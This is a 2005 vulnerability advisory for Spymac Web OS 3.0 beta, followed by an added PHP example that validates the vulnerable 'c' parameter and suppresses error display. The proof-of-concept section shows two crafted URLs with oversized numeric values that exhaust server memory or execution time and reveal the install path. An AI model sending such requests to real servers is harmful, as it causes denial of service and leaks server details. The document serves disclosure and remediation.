Spymac Web os 3.0 Abuse server´s memory and path disclose

Saturday, May 14, 2005
#########################################################
Spymac Web os 3.0 Abuse server´s memory and path disclose
vendor url:http://www.spymac.com/network.php?p=webos&wwg=20
Vendor notified: yes   exploit available: yes
Original advisory: http://lostmon.blogspot.com/2005/05/spymac-web-os-30-abuse-servers-memory.html
########################################################

Spymac is powered by an integrated collection of applications
(developed in-house) that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.


This flaw exists because the application does not validate the 'c'
parameter before the script acts on it. A user can craft a URL
whose 'c' value makes the server consume all of its memory or
execution time, and the resulting PHP fatal error reveals the
installation path of the application, leading to a denial of
service and loss of integrity.

###############
versions
################

Spymac Webos 3.0 beta 190

################
solution
################

no solution at this time.

###############
timeline
###############

discovered: 11 april 2005
vendor notify: 12 april 2005
vendor response: none
Disclosure on Spymac bug forum :12 april 2005
Public disclosure: 14 may 2005


############################################
Full path disclosure and abuse of the memory
############################################

http://www.spymac.com/forums/showthread.php?threadid=134134&c=900000000000000000000000000000

Fatal error: Maximum execution time of 120 seconds exceeded in /var/www/[victim]/classes/global_class.inc on line 770

--

with negative number:

http://[victim]/forums/showthread.php?threadid=134134&c=-900000000000000000000000000000

Fatal error: Allowed memory size of 67108864 bytes exhausted
(tried to allocate 3840 bytes) in
/var/www/[victim]/classes/global_class.inc(201) :
regexp code on line 1
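The two requests above show the same root cause from both sides: a numeric parameter that is never bounded, and PHP fatal errors rendered straight into the response. The following is an added example of how a PHP application can close both gaps; it is not Spymac's code and was not published with this advisory. The bound of 1..100 for 'c' is an assumption made for the example (the advisory does not say what 'c' means), and the hypothetical function bounded_int() and the constants C_MIN / C_MAX are names chosen here.

```php
<?php
// Added example, not Spymac's code: a bounded-integer check for a numeric
// query parameter such as 'c', plus the error-display settings that keep
// PHP fatal errors (and the install path they contain) out of the response.

// Never render errors into the page; write them to the error log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Return $value as an int within [$min, $max], or null when it is not a
 * well-formed integer in that range. FILTER_VALIDATE_INT rejects strings
 * that do not fit in a PHP int, so values like the advisory's
 * 900000000000000000000000000000 (and its negative counterpart) are
 * refused before any loop, allocation or regex ever sees them.
 */
function bounded_int(?string $value, int $min, int $max): ?int
{
    if ($value === null) {
        return null;
    }
    $result = filter_var($value, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return ($result === false) ? null : $result;
}

// Hypothetical bound for the thread-view parameter; the real limit depends
// on what 'c' means in the application, which the advisory does not state.
const C_MIN = 1;
const C_MAX = 100;

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs, including the two values from the advisory.
    $samples = [
        '1', '100', '101', '0',
        '900000000000000000000000000000',
        '-900000000000000000000000000000',
        '12abc', '', null,
    ];
    foreach ($samples as $s) {
        $c = bounded_int($s, C_MIN, C_MAX);
        printf("%-34s -> %s\n", var_export($s, true),
            $c === null ? 'rejected (HTTP 400)' : "accepted c=$c");
    }
} else {
    // Web request: refuse anything outside the bound before doing any work.
    $c = bounded_int($_GET['c'] ?? null, C_MIN, C_MAX);
    if ($c === null) {
        http_response_code(400);
        echo 'Invalid value for parameter c.';
        exit;
    }
    // ... render the thread using the validated $c ...
}
```

Run it with `php example.php` to see every sample accepted or rejected; served through a web server it applies the same check to the real `c` query parameter. The ini_set() calls cover errors raised later in the same script, but the more reliable place for display_errors=Off and log_errors=On is php.ini or the server configuration, so that the setting also applies to errors raised before the script's first line executes.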

################### End #######################

thnx to estrella for being my light
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what moves the mind
